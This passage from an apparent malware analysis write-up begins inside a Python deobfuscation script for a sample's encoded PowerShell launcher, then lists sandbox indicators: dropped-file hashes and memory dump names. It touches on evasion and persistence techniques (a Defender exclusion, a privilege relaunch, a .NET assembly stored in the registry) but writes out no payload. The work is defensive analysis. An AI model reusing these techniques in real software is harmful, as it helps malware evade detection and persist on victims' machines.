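    return "\\".join([_HIVES[hive.group(1).lower()], key.group(1), val.group(1)])


if __name__ == "__main__":
    for enc in (ENC_DEFENDER_EXCLUSION, ENC_RUNAS_RELAUNCH):
        print(strip_comment_blocks(decode_encoded_command(enc)))
    flat = deobfuscate(OBFUSCATED_LAUNCHER)
    print(flat)
    print("assembly loaded from:", loader_registry_path(flat))
```

The order of the passes matters: the format-operator expressions are resolved before concatenations so that each produces a plain quoted string the next pass can see, and backticks are removed last because they only ever appear inside already-quoted names here. The registry path the last function returns is the indicator worth hunting for on other hosts, since the dropper and the .job files can be replaced while the assembly sits in the registry.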
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 6d42b6da621e8df5674e26b799c8e2aa
  SHA1: ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
  SHA256: 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
  SHA512: 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Memory dumps (memory/<pid>-<seq>-<range>; filesize in parentheses where the sandbox lists one):
memory/452-146-0x0000000000000000-mapping.dmp
memory/532-145-0x0000000000000000-mapping.dmp
memory/540-148-0x0000000000000000-mapping.dmp
memory/912-162-0x0000000000000000-mapping.dmp
memory/928-158-0x0000000000000000-mapping.dmp
memory/1140-168-0x0000000000000000-mapping.dmp
memory/1196-155-0x0000000000000000-mapping.dmp
memory/1424-196-0x0000000000000000-mapping.dmp
memory/1496-141-0x0000000000000000-mapping.dmp
memory/1504-165-0x0000000000000000-mapping.dmp
memory/1672-197-0x0000000000000000-mapping.dmp
memory/1692-194-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/1692-178-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/1692-175-0x0000000000000000-mapping.dmp
memory/2184-154-0x0000000000000000-mapping.dmp
memory/2216-163-0x0000000000000000-mapping.dmp
memory/2272-139-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/2272-198-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/2272-144-0x000000001D460000-0x000000001D472000-memory.dmp  (72KB)
memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmp  (9.5MB)
memory/2272-133-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/2276-152-0x0000000000000000-mapping.dmp
memory/2372-160-0x0000000000000000-mapping.dmp
memory/2508-186-0x0000000004660000-0x0000000004C88000-memory.dmp  (6.2MB)
memory/2508-181-0x0000000003FF0000-0x0000000004026000-memory.dmp  (216KB)
memory/2816-142-0x0000000000000000-mapping.dmp
memory/3092-191-0x00007FFA81510000-0x00007FFA81705000-memory.dmp  (2.0MB)
memory/3092-179-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/3092-180-0x00007FFA81510000-0x00007FFA81705000-memory.dmp  (2.0MB)
memory/3092-182-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp  (760KB)
memory/3092-190-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/3092-192-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp  (760KB)
memory/3112-149-0x0000000000000000-mapping.dmp
memory/3592-169-0x0000000000000000-mapping.dmp
memory/3616-150-0x0000000000000000-mapping.dmp
memory/3708-151-0x0000000000000000-mapping.dmp
memory/3716-166-0x0000000000000000-mapping.dmp
memory/3768-193-0x0000000140000000-0x0000000140042000-memory.dmp  (264KB)
memory/3768-183-0x0000000140000000-0x0000000140042000-memory.dmp  (264KB)
memory/3768-187-0x0000000140000000-0x0000000140042000-memory.dmp  (264KB)
memory/3768-185-0x0000000140000000-0x0000000140042000-memory.dmp  (264KB)
memory/3768-195-0x00007FFA81510000-0x00007FFA81705000-memory.dmp  (2.0MB)
memory/3768-189-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp  (760KB)
memory/3768-184-0x00000001400033F4-mapping.dmp
memory/3768-188-0x00007FFA81510000-0x00007FFA81705000-memory.dmp  (2.0MB)
memory/4016-147-0x0000000000000000-mapping.dmp
memory/4032-143-0x0000000000000000-mapping.dmp
memory/4116-159-0x0000000000000000-mapping.dmp
memory/4220-157-0x0000000000000000-mapping.dmp
memory/4248-140-0x0000000000000000-mapping.dmp
memory/4292-156-0x0000000000000000-mapping.dmp
memory/4792-170-0x0000000140000000-0x0000000140056000-memory.dmp  (344KB)
memory/4792-174-0x0000000140000000-0x0000000140056000-memory.dmp  (344KB)
memory/4792-172-0x0000000140000000-0x0000000140056000-memory.dmp  (344KB)
memory/4792-171-0x0000000140001844-mapping.dmp
memory/4792-173-0x0000000140000000-0x0000000140056000-memory.dmp  (344KB)
memory/4808-153-0x0000000000000000-mapping.dmp
memory/4820-164-0x0000000000000000-mapping.dmp
memory/4896-161-0x0000000000000000-mapping.dmp
memory/4940-167-0x0000000000000000-mapping.dmp
memory/4976-136-0x0000000000000000-mapping.dmp
memory/4976-138-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp  (10.8MB)
memory/4976-137-0x0000021F42470000-0x0000021F42492000-memory.dmp  (136KB)